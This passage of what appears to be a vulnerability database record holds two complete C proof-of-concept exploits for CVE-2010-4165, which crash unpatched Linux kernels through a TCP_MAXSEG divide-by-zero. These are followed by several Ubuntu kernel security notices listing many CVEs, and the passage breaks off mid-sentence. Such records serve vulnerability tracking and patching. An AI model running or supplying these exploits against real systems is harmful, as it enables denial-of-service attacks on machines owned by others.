(Denial of Service) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-10T00:00:00", "id": "EXPLOITPACK:19AFA2110050988DFA5D313E85E6EBB8", "href": "", "sourceData": "/*\n * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2\n * by zx2c4\n *\n * This exploit triggers CVE-2010-4165, a divide by zero\n * error in net/ipv4/tcp.c. Because this is on the softirq\n * path, the kernel oopses and then completely dies with\n * no chance of recovery. It has been very reliable as a\n * DoS, but is not useful for triggering other bugs.\n *\n * -zx2c4, 28-2-2011\n */\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <net/if.h>\n#include <arpa/inet.h>\n#include <netinet/tcp.h>\n\nint main()\n{\n\tstruct sockaddr_in laddr;\n\tmemset(&laddr, 0, sizeof(laddr));\n\tladdr.sin_family = AF_INET;\n\tladdr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\tladdr.sin_port = htons(31337);\n\tint listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\n\tif (listener < 0) {\n\t\tprintf(\"[-] Could not open listener.\\n\");\n\t\treturn -1;\n\t}\n\tint val = 12;\n\tif (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) {\n\t\tprintf(\"[-] Could not set sockopt.\\n\");\n\t\treturn -1;\n\t}\n\tif (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\n\t\tprintf(\"[-] Could not bind to address.\\n\");\n\t\treturn -1;\n\t}\n\tif (listen(listener, 1) < 0) {\n\t\tprintf(\"[-] Could not listen.\\n\");\n\t\treturn -1;\n\t}\n\tint hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\n\tif (hello < 0) {\n\t\tprintf(\"[-] Could not open connector.\\n\");\n\t\treturn -1;\n\t}\n\tif (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {\n\t\tprintf(\"[-] Could not connect to listener.\\n\");\n\t\treturn -1;\n\t}\n\tprintf(\"[-] Connection did not trigger oops.\\n\");\n\treturn 0;\n}", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.37 - Local Kernel Denial of Service (1)", "edition": 1, "published": "2011-03-02T00:00:00", "title": "Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2011-03-02T00:00:00", "id": "EXPLOITPACK:35A7E74CF2E35E93303353718B439DD4", "href": "", "sourceData": "/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)\n * =======================================================\n * A divide by 0 error occurs in tcp_select_initial_window\n * when processing user supplied TCP_MAXSEG facilitating a\n * local denial-of-service condition (kernel oops!) in all\n * Linux Kernel 2.6.x branch (2.6.37 & below). This issue \n * can be triggered easily with a call to setsockopt() on \n * a listening network socket and then establishing a TCP\n * connection to the awaiting socket. \n * \n * -- prdelka\n *\n */\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <netinet/tcp.h>\n\n\nint main() {\n\tint optval, optlen, ret, sd, sd2, pid;\n\tchar *host = \"localhost\";\t\n\tstruct sockaddr_in locAddr;\n\tstruct sockaddr_in servAddr;\n\tstruct sockaddr_in dstAddr;\n\tprintf(\"[ Linux Kernel tcp_select_initial_window divide by 0 DoS\\n\");\t\n\tsd = socket(AF_INET, SOCK_STREAM, 0);\n\tmemset(&servAddr,0,sizeof(servAddr));\n\tmemset(&dstAddr,0,sizeof(dstAddr));\n servAddr.sin_family = AF_INET;\n servAddr.sin_port = htons(60000);\n servAddr.sin_addr.s_addr = INADDR_ANY;\n\tdstAddr.sin_family = AF_INET;\n\tinet_aton(\"127.0.0.1\", &dstAddr.sin_addr);\n\tdstAddr.sin_port = htons(60000);\n if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){\n printf(\"[ Cannot bind listener service\\n\");\n exit(-1);\n }\n\tlisten(sd,4);\n\toptval = 12;\n\tret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));\n\tif(ret==0)\n\t{\n\t\tprintf(\"[ System is not patched against CVE-2010-4165\\n[ Goodnight, sweet prince.\\n\");\n\t\tint sin_size = sizeof(struct sockaddr_in);\n\t\tswitch(pid = fork())\n\t\t{\n\t\t\tcase 0:\n\t\t\t\tsd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);\n\t\t\t\tsleep(3);\n\t\t\tdefault:\n\t\t\t\tsd2 = socket(AF_INET, SOCK_STREAM, 0);\n\t\t\t\tconnect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));\n\t\t\t\tsleep(3);\n\t\t}\n\t}\n\tprintf(\"[ System is patched, no dreams for this prince\\n\");\n\treturn 0;\n}", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:35:07", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4073", "CVE-2010-4165", "CVE-2010-3881", "CVE-2010-4083", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-4243", "CVE-2010-4079", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4160", "CVE-2010-4164", "CVE-2010-4256", "CVE-2010-3873", "CVE-2010-4175"], "description": "Gleb Napatov discovered that KVM did not correctly check certain privileged \noperations. A local attacker with access to a guest kernel could exploit \nthis to crash the host system, leading to a denial of service. \n(CVE-2010-0435)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation \ncontained multiple integer signedness errors. A local attacker could \nexploit this to gain root privileges. (CVE-2010-3859)\n\nDan Rosenberg discovered that the Linux kernel X.25 implementation \nincorrectly parsed facilities. A remote attacker could exploit this to \ncrash the kernel, leading to a denial of service. (CVE-2010-3873)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did not \ncorrectly calculate the size of certain buffers. A local attacker could \nexploit this to crash the system or possibly execute arbitrary code as the \nroot user. (CVE-2010-3874)\n\nVasiliy Kulikov discovered that kvm did not correctly clear memory. A local \nattacker could exploit this to read portions of the kernel stack, leading \nto a loss of privacy. (CVE-2010-3881)\n\nDan Rosenberg discovered that IPC structures were not correctly initialized \non 64bit systems. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4073)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4079)\n\nDan Rosenberg discovered that the semctl syscall did not correctly clear \nkernel memory. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4083)\n\nDan Rosenberg discovered that the socket filters did not correctly \ninitialize structure memory. A local attacker could create malicious \nfilters to read portions of kernel stack memory, leading to a loss of \nprivacy. (CVE-2010-4158)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation \ncontained multiple integer signedness errors. A local attacker could \nexploit this to to crash the kernel, or possibly gain root privileges. \n(CVE-2010-4160)\n\nDan Rosenberg discovered that certain iovec operations did not calculate \npage counts correctly. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4162)\n\nDan Rosenberg discovered multiple flaws in the X.25 facilities parsing. If \na system was using X.25, a remote attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4164)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly \nhandle merged VMAs. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4169)\n\nDan Rosenberg discovered that the RDS protocol did not correctly check \nioctl arguments. A local attacker could exploit this to crash the system, \nleading to a denial of service. (CVE-2010-4175)\n\nBrad Spengler discovered that the kernel did not correctly account for \nuserspace memory allocations during exec() calls. A local attacker could \nexploit this to consume all system memory, leading to a denial of service. \n(CVE-2010-4243)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)\n\nIt was discovered that named pipes did not correctly handle certain fcntl \ncalls. A local attacker could exploit this to crash the system, leading to \na denial of service. (CVE-2010-4256)\n\nNelson Elhage discovered that the kernel did not correctly handle process \ncleanup after triggering a recoverable kernel bug. If a local attacker were \nable to trigger certain kinds of kernel bugs, they could create a specially \ncrafted process to gain root privileges. (CVE-2010-4258)", "edition": 5, "modified": "2011-02-01T00:00:00", "published": "2011-02-01T00:00:00", "id": "USN-1054-1", "href": "https://ubuntu.com/security/notices/USN-1054-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-15T13:52:16", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4074", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-3876", "CVE-2010-3698", "CVE-2010-4248", "CVE-2010-4079", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-3873", "CVE-2010-3448", "CVE-2010-4078"], "description": "Gleb Napatov discovered that KVM did not correctly check certain privileged \noperations. A local attacker with access to a guest kernel could exploit \nthis to crash the host system, leading to a denial of service. \n(CVE-2010-0435)\n\nDan Jacobson discovered that ThinkPad video output was not correctly access \ncontrolled. A local attacker could exploit this to hang the system, leading \nto a denial of service. (CVE-2010-3448)\n\nIt was discovered that KVM did not correctly initialize certain CPU \nregisters. A local attacker could exploit this to crash the system, leading \nto a denial of service. (CVE-2010-3698)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation \ncontained multiple integer signedness errors. A local attacker could \nexploit this to gain root privileges. (CVE-2010-3859)\n\nThomas Pollet discovered that the RDS network protocol did not \ncheck certain iovec buffers. A local attacker could exploit this \nto crash the system or possibly execute arbitrary code as the root \nuser. (CVE-2010-3865)\n\nDan Rosenberg discovered that the Linux kernel X.25 implementation \nincorrectly parsed facilities. A remote attacker could exploit this to \ncrash the kernel, leading to a denial of service. (CVE-2010-3873)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did not \ncorrectly calculate the size of certain buffers. A local attacker could \nexploit this to crash the system or possibly execute arbitrary code as \nthe root user. (CVE-2010-3874)\n\nVasiliy Kulikov discovered that the Linux kernel X.25 implementation did \nnot correctly clear kernel memory. A local attacker could exploit this to \nread kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)\n\nVasiliy Kulikov discovered that the Linux kernel sockets implementation did \nnot properly initialize certain structures. A local attacker could exploit \nthis to read kernel stack memory, leading to a loss of privacy. \n(CVE-2010-3876)\n\nVasiliy Kulikov discovered that the TIPC interface did not correctly \ninitialize certain structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-3877)\n\nNelson Elhage discovered that the Linux kernel IPv4 implementation did not \nproperly audit certain bytecodes in netlink messages. A local attacker \ncould exploit this to cause the kernel to hang, leading to a denial of \nservice. (CVE-2010-3880)\n\nDan Rosenberg discovered that IPC structures were not correctly initialized \non 64bit systems. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4073)\n\nDan Rosenberg discovered that the USB subsystem did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4074)\n\nDan Rosenberg discovered that the SiS video driver did not correctly clear \nkernel memory. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4078)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4079)\n\nDan Rosenberg discovered that the RME Hammerfall DSP audio interface driver \ndid not correctly clear kernel memory. A local attacker could exploit this \nto read kernel stack memory, leading to a loss of privacy. (CVE-2010-4080, \nCVE-2010-4081)\n\nDan Rosenberg discovered that the VIA video driver did not correctly \nclear kernel memory. A local attacker could exploit this to read kernel \nstack memory, leading to a loss of privacy. (CVE-2010-4082)\n\nDan Rosenberg discovered that the semctl syscall did not correctly clear \nkernel memory. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4083)\n\nJames Bottomley discovered that the ICP vortex storage array controller \ndriver did not validate certain sizes. A local attacker on a 64bit system \ncould exploit this to crash the kernel, leading to a denial of service. \n(CVE-2010-4157)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation \ncontained multiple integer signedness errors. A local attacker could \nexploit this to to crash the kernel, or possibly gain root privileges. \n(CVE-2010-4160)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly \nhandle merged VMAs. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4169)\n\nIt was discovered that multithreaded exec did not handle CPU timers \ncorrectly. A local attacker could exploit this to crash the system, leading \nto a denial of service. (CVE-2010-4248)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)", "edition": 6, "modified": "2011-02-25T00:00:00", "published": "2011-02-25T00:00:00", "id": "USN-1073-1", "href": "https://ubuntu.com/security/notices/USN-1073-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-28T13:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4649", "CVE-2011-1173", "CVE-2011-2484", "CVE-2011-0711", "CVE-2011-1044", "CVE-2010-4249", "CVE-2011-1010", "CVE-2011-1170", "CVE-2011-1172", "CVE-2010-4238", "CVE-2011-1171", "CVE-2011-2534", "CVE-2011-1090"], "description": "Dan Rosenberg discovered that IPC structures were not correctly initialized \non 64bit systems. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4073)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nVladymyr Denysov discovered that Xen virtual CD-ROM devices were not \nhandled correctly. A local attacker in a guest could make crafted blkback \nrequests that would crash the host, leading to a denial of service. \n(CVE-2010-4238)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)\n\nDan Carpenter discovered that the Infiniband driver did not correctly \nhandle certain requests. A local user could exploit this to crash the \nsystem or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)\n\nDan Rosenberg discovered that XFS did not correctly initialize memory. A \nlocal attacker could make crafted ioctl calls to leak portions of kernel \nstack memory, leading to a loss of privacy. (CVE-2011-0711)\n\nTimo Warns discovered that MAC partition parsing routines did not correctly \ncalculate block counts. A local attacker with physical access could plug in \na specially crafted block device to crash the system or potentially gain \nroot privileges. (CVE-2011-1010)\n\nNeil Horman discovered that NFSv4 did not correctly handle certain orders \nof operation with ACL data. A remote attacker with access to an NFSv4 mount \ncould exploit this to crash the system, leading to a denial of service. \n(CVE-2011-1090)\n\nVasiliy Kulikov discovered that the netfilter code did not check certain \nstrings copied from userspace. A local attacker with netfilter access could \nexploit this to read kernel memory or crash the system, leading to a denial \nof service. (CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-2534)\n\nVasiliy Kulikov discovered that the Acorn Universal Networking driver did \nnot correctly initialize memory. A remote attacker could send specially \ncrafted traffic to read kernel stack memory, leading to a loss of privacy. \n(CVE-2011-1173)\n\nVasiliy Kulikov discovered that taskstats listeners were not correctly \nhandled. A local attacker could expoit this to exhaust memory and CPU \nresources, leading to a denial of service. (CVE-2011-2484)", "edition": 6, "modified": "2011-08-09T00:00:00", "published": "2011-08-09T00:00:00", "id": "USN-1186-1", "href": "https://ubuntu.com/security/notices/USN-1186-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:39:20", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4242", "CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-4081", "CVE-2010-3297", "CVE-2010-2248", "CVE-2010-4073", "CVE-2010-2226", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-2521", "CVE-2010-2943", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-3477", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-4158", "CVE-2010-2524", "CVE-2010-3296", "CVE-2010-2478", "CVE-2010-3850", "CVE-2010-3015", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-4243", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-2537", "CVE-2010-3084", "CVE-2010-4164", "CVE-2010-2798", "CVE-2010-4256", "CVE-2010-2962", "CVE-2011-0709", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-2538", "CVE-2010-4175", "CVE-2010-3861", "CVE-2010-3301", "CVE-2010-4655"], "description": "Dan Rosenberg discovered that the RDS network protocol did not correctly \ncheck certain parameters. A local attacker could exploit this gain root \nprivileges. (CVE-2010-3904)\n\nNelson Elhage discovered several problems with the Acorn Econet protocol \ndriver. A local user could cause a denial of service via a NULL pointer \ndereference, escalate privileges by overflowing the kernel stack, and \nassign Econet addresses to arbitrary interfaces. (CVE-2010-3848, \nCVE-2010-3849, CVE-2010-3850)\n\nBen Hawkes discovered that the Linux kernel did not correctly filter \nregisters on 64bit kernels when performing 32bit system calls. On a 64bit \nsystem, a local attacker could manipulate 32bit system calls to gain root \nprivileges. (CVE-2010-3301)\n\nAl Viro discovered a race condition in the TTY driver. A local attacker \ncould exploit this to crash the system, leading to a denial of service. \n(CVE-2009-4895)\n\nGleb Napatov discovered that KVM did not correctly check certain privileged \noperations. A local attacker with access to a guest kernel could exploit \nthis to crash the host system, leading to a denial of service. \n(CVE-2010-0435)\n\nDan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly \ncheck file permissions. A local attacker could overwrite append-only files, \nleading to potential data loss. (CVE-2010-2066)\n\nDan Rosenberg discovered that the swapexit xfs ioctl did not correctly \ncheck file permissions. A local attacker could exploit this to read from \nwrite-only files, leading to a loss of privacy. (CVE-2010-2226)\n\nSuresh Jayaraman discovered that CIFS did not correctly validate certain \nresponse packats. A remote attacker could send specially crafted traffic \nthat would crash the system, leading to a denial of service. \n(CVE-2010-2248)\n\nBen Hutchings discovered that the ethtool interface did not correctly check \ncertain sizes. A local attacker could perform malicious ioctl calls that \ncould crash the system, leading to a denial of service. (CVE-2010-2478, \nCVE-2010-3084)\n\nJames Chapman discovered that L2TP did not correctly evaluate checksum \ncapabilities. If an attacker could make malicious routing changes, they \ncould crash the system, leading to a denial of service. (CVE-2010-2495)\n\nNeil Brown discovered that NFSv4 did not correctly check certain write \nrequests. A remote attacker could send specially crafted traffic that could \ncrash the system or possibly gain root privileges. (CVE-2010-2521)\n\nDavid Howells discovered that DNS resolution in CIFS could be spoofed. A \nlocal attacker could exploit this to control DNS replies, leading to a loss \nof privacy and possible privilege escalation. (CVE-2010-2524)\n\nDan Rosenberg discovered that the btrfs filesystem did not correctly \nvalidate permissions when using the clone function. A local attacker could \noverwrite the contents of file handles that were opened for append-only, or \npotentially read arbitrary contents, leading to a loss of privacy. \n(CVE-2010-2537, CVE-2010-2538)\n\nBob Peterson discovered that GFS2 rename operations did not correctly \nvalidate certain sizes. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-2798)\n\nEric Dumazet discovered that many network functions could leak kernel stack \ncontents. A local attacker could exploit this to read portions of kernel \nmemory, leading to a loss of privacy. (CVE-2010-2942, CVE-2010-3477)\n\nDave Chinner discovered that the XFS filesystem did not correctly order \ninode lookups when exported by NFS. A remote attacker could exploit this to \nread or write disk blocks that had changed file assignment or had become \nunlinked, leading to a loss of privacy. (CVE-2010-2943)\n\nSergey Vlasov discovered that JFS did not correctly handle certain extended \nattributes. A local attacker could bypass namespace access rules, leading \nto a loss of privacy. (CVE-2010-2946)\n\nTavis Ormandy discovered that the IRDA subsystem did not correctly shut \ndown. A local attacker could exploit this to cause the system to crash or \npossibly gain root privileges. (CVE-2010-2954)\n\nBrad Spengler discovered that the wireless extensions did not correctly \nvalidate certain request sizes. A local attacker could exploit this to read \nportions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n\nTavis Ormandy discovered that the session keyring did not correctly check \nfor its parent. On systems without a default session keyring, a local \nattacker could exploit this to crash the system, leading to a denial of \nservice. (CVE-2010-2960)\n\nKees Cook discovered that the Intel i915 graphics driver did not correctly \nvalidate memory regions. A local attacker with access to the video card \ncould read and write arbitrary kernel memory to gain root privileges. \n(CVE-2010-2962)\n\nKees Cook discovered that the V4L1 32bit compat interface did not correctly \nvalidate certain parameters. A local attacker on a 64bit system with access \nto a video device could exploit this to gain root privileges. \n(CVE-2010-2963)\n\nToshiyuki Okajima discovered that ext4 did not correctly check certain \nparameters. A local attacker could exploit this to crash the system or \noverwrite the last block of large files. (CVE-2010-3015)\n\nTavis Ormandy discovered that the AIO subsystem did not correctly validate \ncertain parameters. A local attacker could exploit this to crash the system \nor possibly gain root privileges. (CVE-2010-3067)\n\nDan Rosenberg discovered that certain XFS ioctls leaked kernel stack \ncontents. A local attacker could exploit this to read portions of kernel \nmemory, leading to a loss of privacy. (CVE-2010-3078)\n\nRobert Swiecki discovered that ftrace did not correctly handle mutexes. A \nlocal attacker could exploit this to crash the kernel, leading to a denial \nof service. (CVE-2010-3079)\n\nTavis Ormandy discovered that the OSS sequencer device did not correctly \nshut down. A local attacker could exploit this to crash the system or \npossibly gain root privileges. (CVE-2010-3080)\n\nDan Rosenberg discovered that several network ioctls did not clear kernel \nmemory correctly. A local user could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-3296, CVE-2010-3297, \nCVE-2010-3298)\n\nDan Rosenberg discovered that the ROSE driver did not correctly check \nparameters. A local attacker with access to a ROSE network device could \nexploit this to crash the system or possibly gain root privileges. \n(CVE-2010-3310)\n\nThomas Dreibholz discovered that SCTP did not correctly handle appending \npacket chunks. A remote attacker could send specially crafted traffic to \ncrash the system, leading to a denial of service. (CVE-2010-3432)\n\nDan Rosenberg discovered that the CD driver did not correctly check \nparameters. A local attacker could exploit this to read arbitrary kernel \nmemory, leading to a loss of privacy. (CVE-2010-3437)\n\nDan Rosenberg discovered that the Sound subsystem did not correctly \nvalidate parameters. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-3442)\n\nDan Rosenberg discovered that SCTP did not correctly handle HMAC \ncalculations. A remote attacker could send specially crafted traffic that \nwould crash the system, leading to a denial of service. (CVE-2010-3705)\n\nBrad Spengler discovered that stack memory for new a process was not \ncorrectly calculated. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-3858)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation \ncontained multiple integer signedness errors. A local attacker could \nexploit this to gain root privileges. (CVE-2010-3859)\n\nKees Cook discovered that the ethtool interface did not correctly clear \nkernel memory. A local attacker could read kernel heap memory, leading to a \nloss of privacy. (CVE-2010-3861)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did not \ncorrectly calculate the size of certain buffers. A local attacker could \nexploit this to crash the system or possibly execute arbitrary code as the \nroot user. (CVE-2010-3874)\n\nKees Cook and Vasiliy Kulikov discovered that the shm interface did not \nclear kernel memory correctly. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4072)\n\nDan Rosenberg discovered that IPC structures were not correctly initialized \non 64bit systems. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4073)\n\nDan Rosenberg discovered that the RME Hammerfall DSP audio interface driver \ndid not correctly clear kernel memory. A local attacker could exploit this \nto read kernel stack memory, leading to a loss of privacy. (CVE-2010-4080, \nCVE-2010-4081)\n\nDan Rosenberg discovered that the VIA video driver did not correctly clear \nkernel memory. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4082)\n\nJames Bottomley discovered that the ICP vortex storage array controller \ndriver did not validate certain sizes. A local attacker on a 64bit system \ncould exploit this to crash the kernel, leading to a denial of service. \n(CVE-2010-4157)\n\nDan Rosenberg discovered that the socket filters did not correctly \ninitialize structure memory. A local attacker could create malicious \nfilters to read portions of kernel stack memory, leading to a loss of \nprivacy. (CVE-2010-4158)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation \ncontained multiple integer signedness errors. A local attacker could \nexploit this to to crash the kernel, or possibly gain root privileges. \n(CVE-2010-4160)\n\nDan Rosenberg discovered that certain iovec operations did not calculate \npage counts correctly. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4162)\n\nDan Rosenberg discovered multiple flaws in the X.25 facilities parsing. If \na system was using X.25, a remote attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4164)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly \nhandle merged VMAs. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4169)\n\nDan Rosenberg discovered that the RDS protocol did not correctly check \nioctl arguments. A local attacker could exploit this to crash the system, \nleading to a denial of service. (CVE-2010-4175)\n\nAlan Cox discovered that the HCI UART driver did not correctly check if a \nwrite operation was available. If the mmap_min-addr sysctl was changed from \nthe Ubuntu default to a value of 0, a local attacker could exploit this \nflaw to gain root privileges. (CVE-2010-4242)\n\nBrad Spengler discovered that the kernel did not correctly account for \nuserspace memory allocations during exec() calls. A local attacker could \nexploit this to consume all system memory, leading to a denial of service. \n(CVE-2010-4243)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)\n\nIt was discovered that named pipes did not correctly handle certain fcntl \ncalls. A local attacker could exploit this to crash the system, leading to \na denial of service. (CVE-2010-4256)\n\nNelson Elhage discovered that the kernel did not correctly handle process \ncleanup after triggering a recoverable kernel bug. If a local attacker were \nable to trigger certain kinds of kernel bugs, they could create a specially \ncrafted process to gain root privileges. (CVE-2010-4258)\n\nKees Cook discovered that some ethtool functions did not correctly clear \nheap memory. A local attacker with CAP_NET_ADMIN privileges could exploit \nthis to read portions of kernel heap memory, leading to a loss of privacy. \n(CVE-2010-4655)\n\nFrank Arnold discovered that the IGMP protocol did not correctly parse \ncertain packets. A remote attacker could send specially crafted traffic to \ncrash the system, leading to a denial of service. (CVE-2011-0709)", "edition": 5, "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "id": "USN-1083-1", "href": "https://ubuntu.com/security/notices/USN-1083-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-3297", "CVE-2010-2248", "CVE-2010-4073", "CVE-2010-2226", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-4074", "CVE-2010-2521", "CVE-2010-2943", "CVE-2010-3477", "CVE-2010-4169", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-2524", "CVE-2010-3296", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-3850", "CVE-2010-3015", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-4079", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3084", "CVE-2010-2798", "CVE-2010-2962", "CVE-2010-3448", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-4078", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-2538", "CVE-2010-3861", "CVE-2010-3301"], "description": "Dan Rosenberg discovered that the RDS network protocol did not correctly \ncheck certain parameters. A local attacker could exploit this gain root \nprivileges. (CVE-2010-3904)\n\nNelson Elhage discovered several problems with the Acorn Econet protocol \ndriver. A local 